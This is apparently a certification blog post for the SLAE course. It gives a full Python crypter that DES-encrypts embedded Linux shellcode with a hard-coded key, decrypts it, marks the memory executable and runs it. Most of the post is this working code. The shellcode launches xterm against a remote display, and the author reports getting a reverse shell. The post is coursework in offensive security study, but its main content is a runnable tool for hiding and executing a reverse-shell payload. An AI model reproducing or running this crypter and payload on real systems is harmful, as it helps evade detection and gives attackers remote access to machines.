Tuesday 20 September 2016

SLAE Assignment 7 - Custom Crypter

SLAE Assignment 7 - Custom Crypter

 The final assignment is to create a crypter which will encrypt a given shellcode and decrypt the same .  This was one of the difficult assignment for me . I have gone through many blogs and websites and finally decided to create one based on this website . http://www.laurentluce.com/posts/python-and-cryptography-with-pycrypto/ . The below code is my final crypter code . It uses DES in CFB mode with a static key and random IV. The entire working of the algorithm and the usage using pycrypto is best written in the above mentioned blog .



from ctypes import *
from Crypto.Cipher import DES
from Crypto import Random
iv = Random.get_random_bytes(8)
des1 = DES.new('12341234', DES.MODE_CFB, iv)
des2 = DES.new('12341234', DES.MODE_CFB, iv)
#Shellcode
shellcodeplacement = ""
shellcodeplacement += "\x31\xc0\x31\xd2\x31\xf6\x31\xc9\x50\x68\x31\x3a\x31\x30\x68\x31\x2e\x31\x2e\x68\x31\x32\x37\x2e\x89\xe6\x50\x68\x70\x6c\x61\x79\x68\x2d\x64\x69\x73\x89\xe7\x50\x68\x74\x65\x72\x6d\x68\x69\x6e\x2f\x78\x68\x73\x72\x2f\x62\x68\x2f\x2f\x2f\x75\x89\xe3\x50\x56\x57\x53\x89\xe1\xb0\x0b\xcd\x80"
#printing the shellcode
def print_shellcode(shellcode):
        encoded = ""
        for x in bytearray(shellcode):
                value = x
                encoded += '\\x'
                encoded += '%02x' % value
        print (encoded)
#Encrypting the shellcode using the key 12341234 and random IV
encrypt_shellcode = des1.encrypt(shellcodeplacement)
#Encrypted Shellcode
print ("Encrypted shellcode is")
print_shellcode(encrypt_shellcode)
#Decrypting the shellcode using the same key
decrypt_shellcode = des2.decrypt(encrypt_shellcode)
#Decrypted Shellcode
print 'Decrypted shellcode is'
print_shellcode(decrypt_shellcode)
#executing shellcode
libc = CDLL('libc.so.6')
sc = c_char_p(decrypt_shellcode)
size = len(decrypt_shellcode)
shell = c_void_p(libc.valloc(size))
memmove(shell,sc,size)
libc.mprotect(shell,size,0x7)
print (len(decrypt_shellcode))
execute = cast(shell, CFUNCTYPE(c_void_p))
execute()

 Lets execute the same and see the result . I have used my favorite shellcode which i have created and posted in exploit db .

 


As you can see from the above picture our shellcode worked and we got a reverse shell using xterm . 


This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/"
Student ID: SLAE – 739


All the files used can be found here https://github.com/rtv7/SLAE
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)